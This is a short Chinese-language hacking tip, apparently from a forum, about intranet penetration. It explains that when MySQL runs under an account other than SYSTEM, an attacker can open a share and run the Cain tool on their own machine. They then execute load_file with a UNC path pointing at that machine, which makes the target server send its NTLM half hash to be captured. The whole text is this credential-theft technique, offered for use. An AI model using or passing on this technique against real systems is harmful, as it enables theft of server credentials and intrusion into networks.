Thx Ninty

内网渗透时
如果MYSQL不是SYSTEM启动的。。 而是由别的账号启动的话。
本机开个共享,开个CAIN。。 MYSQL里面执行load_file('\\\\ip\c$\a.txt')
可以抓到目标服务器的HALF HASH.。